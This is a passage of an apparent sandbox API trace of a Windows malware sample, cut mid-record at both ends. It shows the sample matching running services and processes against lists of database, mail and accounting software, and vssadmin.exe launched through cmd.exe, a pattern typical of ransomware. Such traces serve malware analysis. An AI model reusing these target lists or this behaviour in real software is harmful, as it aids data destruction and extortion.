(lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0044.760] lstrlenW (lpString="Themes") returned 6 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0044.761] lstrlenW (lpString="TrkWks") returned 6 [0044.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0044.761] lstrlenW (lpString="UxSms") returned 5 [0044.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0044.761] lstrlenW (lpString="VSS") returned 3 [0044.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0044.761] lstrlenW (lpString="WdiServiceHost") returned 14 [0044.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0044.761] lstrlenW (lpString="WdiSystemHost") returned 13 [0044.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.761] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0044.761] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0044.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0044.761] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0044.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.762] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0044.762] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0044.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0044.762] lstrlenW (lpString="Winmgmt") returned 7 [0044.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0044.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0044.762] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0044.762] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0044.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0044.762] lstrlenW (lpString="WPDBusEnum") returned 10 [0044.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.762] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0044.762] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0044.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0044.762] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f34088 | out: hHeap=0x570000) returned 1 [0044.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204 [0044.765] Process32FirstW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.765] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.766] lstrlenW (lpString="System") returned 6 [0044.766] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0044.766] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0044.766] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.767] lstrlenW (lpString="smss.exe") returned 8 [0044.767] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0044.767] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0044.767] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.768] lstrlenW (lpString="csrss.exe") returned 9 [0044.768] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.768] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0044.768] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0044.768] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0044.768] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0044.768] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0044.768] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0044.768] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.769] lstrlenW (lpString="wininit.exe") returned 11 [0044.769] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0044.769] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0044.769] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0044.769] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.770] lstrlenW (lpString="csrss.exe") returned 9 [0044.770] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.771] lstrlenW (lpString="winlogon.exe") returned 12 [0044.771] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.771] lstrlenW (lpString="services.exe") returned 12 [0044.771] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.772] lstrlenW (lpString="lsass.exe") returned 9 [0044.772] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.773] lstrlenW (lpString="lsm.exe") returned 7 [0044.773] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.773] lstrlenW (lpString="svchost.exe") returned 11 [0044.773] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.774] lstrlenW (lpString="svchost.exe") returned 11 [0044.774] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.775] lstrlenW (lpString="svchost.exe") returned 11 [0044.775] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.776] lstrlenW (lpString="svchost.exe") returned 11 [0044.776] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.776] lstrlenW (lpString="svchost.exe") returned 11 [0044.776] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.777] lstrlenW (lpString="audiodg.exe") returned 11 [0044.777] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.778] lstrlenW (lpString="svchost.exe") returned 11 [0044.778] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.778] lstrlenW (lpString="svchost.exe") returned 11 [0044.778] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.779] lstrlenW (lpString="dwm.exe") returned 7 [0044.779] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.780] lstrlenW (lpString="explorer.exe") returned 12 [0044.780] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.781] lstrlenW (lpString="spoolsv.exe") returned 11 [0044.781] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.858] lstrlenW (lpString="taskhost.exe") returned 12 [0044.860] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.861] lstrlenW (lpString="svchost.exe") returned 11 [0044.861] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0044.862] lstrlenW (lpString="taskeng.exe") returned 11 [0044.862] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.863] lstrlenW (lpString="taskhost.exe") returned 12 [0044.863] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0044.864] lstrlenW (lpString="called.exe") returned 10 [0044.864] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0044.864] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0044.864] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0044.865] lstrlenW (lpString="analyst.exe") returned 11 [0044.865] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0044.866] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0044.866] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0044.866] lstrlenW (lpString="wages.exe") returned 9 [0044.866] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0045.092] lstrlenW (lpString="rand.exe") returned 8 [0045.092] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0045.092] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0045.093] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0045.093] lstrlenW (lpString="cottage.exe") returned 11 [0045.093] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0045.094] lstrlenW (lpString="pairs_spec.exe") returned 14 [0045.094] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0045.095] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0045.095] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0045.096] lstrlenW (lpString="observationshairy.exe") returned 21 [0045.096] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0045.096] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0045.096] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0045.097] lstrlenW (lpString="spectrum.exe") returned 12 [0045.097] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0045.098] lstrlenW (lpString="dies.exe") returned 8 [0045.098] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0045.099] lstrlenW (lpString="configured.exe") returned 14 [0045.099] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0045.099] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0045.099] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0045.100] lstrlenW (lpString="fast.exe") returned 8 [0045.100] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0045.101] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0045.101] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0045.102] lstrlenW (lpString="review.exe") returned 10 [0045.102] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0045.102] lstrlenW (lpString="historybinding.exe") returned 18 [0045.102] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0045.103] lstrlenW (lpString="pk task surge.exe") returned 17 [0045.103] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.104] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0045.104] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0045.107] lstrlenW (lpString="mobsync.exe") returned 11 [0045.107] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0045.108] lstrlenW (lpString="ivttvf.exe") returned 10 [0045.108] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0045.108] lstrlenW (lpString="cmd.exe") returned 7 [0045.108] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.109] lstrlenW (lpString="conhost.exe") returned 11 [0045.109] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0045.110] lstrlenW (lpString="vssadmin.exe") returned 12 [0045.110] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0045.110] lstrlenW (lpString="VSSVC.exe") returned 9 [0045.111] Process32NextW (in: hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.111] lstrlenW (lpString="svchost.exe") returned 11 [0045.111] Process32NextW (in: 